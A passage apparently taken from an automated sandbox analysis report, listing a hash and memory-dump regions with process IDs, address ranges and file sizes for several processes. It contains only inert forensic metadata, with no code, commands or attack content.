                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • memory/384-98-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/384-91-0x000001D99E600000-0x000001D99E62C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/384-97-0x000001D99E600000-0x000001D99E62C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/448-46-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/448-45-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/448-44-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/448-43-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/448-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/448-52-0x00007FFCE7ED0000-0x00007FFCE7F8E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                    • memory/448-51-0x00007FFCE9970000-0x00007FFCE9B65000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                    • memory/448-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/616-58-0x000001AEC08A0000-0x000001AEC08CC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/616-64-0x000001AEC08A0000-0x000001AEC08CC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/616-65-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/616-56-0x000001AEC0870000-0x000001AEC0896000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      152KB

                                                                                                                    • memory/616-57-0x000001AEC08A0000-0x000001AEC08CC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/668-70-0x00000176F0FD0000-0x00000176F0FFC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/668-75-0x00000176F0FD0000-0x00000176F0FFC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/668-76-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/740-102-0x0000025D6CD70000-0x0000025D6CD9C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/960-80-0x00000287A69C0000-0x00000287A69EC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/960-87-0x00007FFCA99F0000-0x00007FFCA9A00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/960-86-0x00000287A69C0000-0x00000287A69EC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/2292-39-0x00000233FE240000-0x00000233FE262000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/2292-42-0x00007FFCE7ED0000-0x00007FFCE7F8E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                    • memory/2292-40-0x00000233FE570000-0x00000233FE59A000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      168KB

                                                                                                                    • memory/2292-41-0x00007FFCE9970000-0x00007FFCE9B65000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                    • memory/4280-0-0x00007FFCCB6A3000-0x00007FFCCB6A5000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4280-28-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4280-2-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4280-1-0x0000000000860000-0x000000000089A000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      232KB

                                                                                                                    • memory/4976-24-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4976-22-0x0000000000720000-0x0000000000738000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      96KB

                                                                                                                    • memory/4976-890-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/4976-891-0x00007FFCCB6A0000-0x00007FFCCC161000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      10.8MB